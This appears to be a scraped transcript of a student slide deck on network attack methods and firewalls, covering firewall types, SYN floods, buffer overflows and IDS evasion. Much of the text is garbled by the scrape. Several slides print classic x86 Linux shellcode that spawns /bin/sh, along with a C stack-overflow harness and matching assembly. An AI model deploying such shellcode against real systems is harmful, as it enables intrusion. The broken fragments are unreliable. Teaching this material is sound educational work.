網路攻 擊手法 & 防火牆
DESCRIPTION
網路攻 擊手法 & 防火牆. 課程:系統安全 資訊三乙 許庭銓、梁詠鈞. 前言. 由於 Internet 的迅速發展,帶給人們生活非常多的好處,但是伴隨而來的網路安全問題, 使用防火牆是現在大部分採取的方式,但是防火牆是否真的能夠對於不同的攻擊方式能夠有適當的防禦措施. 防火牆基本分類. 封包過濾防火牆 ( 傳輸層 ) 檢測狀態防火牆 應用程式代理防火牆 NAT. 狀態監測常見方式. 一個防火牆接收到一個初始化 TCP 連接的 SYN 封包,將被規則庫檢查 一個 RST 數據封包發送到遠端的電腦。如果被接受,那麼本次會話被記錄到狀態監測表裡 - PowerPoint PPT PresentationTRANSCRIPT
-
&
-
Internet
-
()NAT
-
TCPSYNRST(SYN)SYN
-
TCPSYNLocalSYN/ACKSYN/ACKACKTCP BacklogTCP
-
Buffer(ShellCode)
-
ShellCodetelnet ShellShellExploit
-
shellcodeShellcode (assembly language)(assembler). (machine code)UNIX /bin/sh . shell
-
ShellCode (C++)char shellcode[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";char large_string[128];int main(int argc, char **argv){char buffer[96];int i;long *long_ptr = (long *) large_string;for (i = 0; i < 32; i++)*(long_ptr + i) = (int) buffer;for (i = 0; i < (int) strlen(shellcode); i++)large_string[i] = shellcode[i];strcpy(buffer, large_string);return 0;}
-
LinuxShell (C++)#include
main() {char *name[2];name[0]="/bin/sh";name[1]=NULL;execve(name[0],name,NULL);}
-
()leal string,string_addr movl $0x0,null_addr movl $0xb,%eax movl string_addr,%ebx leal string_addr,%ecx leal null_string,%edx int $0x80 stringdb"/bin/sh",0 string_addrdd0 null_addrdd0
-
(ShellCode)\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xec\xff\xff\xff/bin/sh
-
IDS
-
1. WebDAVWEBWEBTCP80EXPLOITSD.o.S
-
2. HTTPWebDAVHTTPTCP80SecureIISSecureIIS(SQL)
-
3. IDSIDS
-
tunnel()MSNPorttunnel
-
winsock
-
127.0.0.1guest telnet23NTLMadminSOCKETWEBtelnet,ftp,httpSYSTEM
-
(2006-09-04 )Freedom() 3Freedom3
-
The END~~~
TCP SYN Flood